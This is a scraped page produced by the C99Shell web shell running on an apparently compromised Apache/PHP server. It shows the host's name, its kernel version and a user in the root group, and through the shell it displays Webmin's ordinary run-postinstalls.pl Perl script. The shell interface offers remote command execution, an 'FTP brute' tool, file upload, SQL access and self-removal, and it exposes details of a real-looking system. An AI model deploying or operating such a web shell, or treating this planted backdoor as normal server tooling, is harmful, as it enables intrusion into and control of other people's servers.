!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/   drwxr-xr-x
Free 28.67 GB of 117.98 GB (24.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     run-postinstalls.pl (1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# run-postinstalls.pl
# Run all the postinstall.pl scripts in module and theme directories

use lib '.';
BEGIN { push(@INC, "."); };
$no_acl_check++;
use WebminCore;
&init_config();
@themes = &list_themes();

if (@ARGV > 0) {
    # Running for specified modules
    foreach $a (@ARGV) {
        local %minfo = &get_module_info($a);
        if (!%minfo) {
            # Try for a theme
            ($tinfo) = grep { $_->{'dir'} eq $a } @themes;
            if ($tinfo) {
                push(@mods, $tinfo);
                }
            }
        else {
            push(@mods, \%minfo);
            }
        }
    }
else {
    # Running on all modules and themes
    @mods = ( &get_all_module_infos(), @themes );
    }

foreach $m (@mods) {
    $mdir = &module_root_directory($m->{'dir'});
    if (&check_os_support($m) &&
        -r "$mdir/postinstall.pl") {
        # Call this module's postinstall function
        eval {
            $main::error_must_die = 1;
            &foreign_require($m->{'dir'}, "postinstall.pl");
            &foreign_call($m->{'dir'}, "module_install");
            };
        if ($@) {
            print STDERR "$m->{'dir'}/postinstall.pl failed : $@\n";
            }
        }
    }


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--